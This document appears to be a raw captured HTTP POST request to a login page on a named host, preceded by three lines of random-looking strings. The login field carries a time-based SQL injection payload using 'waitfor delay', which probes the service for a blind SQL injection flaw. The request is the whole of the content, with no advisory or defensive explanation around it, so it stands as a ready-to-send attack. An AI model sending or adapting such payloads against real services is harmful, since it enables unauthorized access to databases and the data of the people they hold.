rfzW2*&VBHJKncn12357
(Jjhdfj&^^Tgj*&56312
KJH1jndvo())311232d1



POST /Login.aspx HTTP/1.1
Host: origin-service.elliemae.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 223
Origin: https://origin-service.elliemae.com
Connection: close
Referer: https://origin-service.elliemae.com/Login.aspx
Upgrade-Insecure-Requests: 1

VIEWSTATE=%2FwEPDwUKMTg5MDQzNTQ2N2Rk0s1DLhmKz90MM8H%2BgAlsHVSkxRhFg8eUXkzyvyT6hyU%3D&VIEWSTATEGENERATOR=C2EE9ABB&mainNav=Login.aspx&subNav=&txtLogin=tst';waitfor+delay'00:00:01';--&txtPwd=Welcome&txtEmail=&ForPassword=false
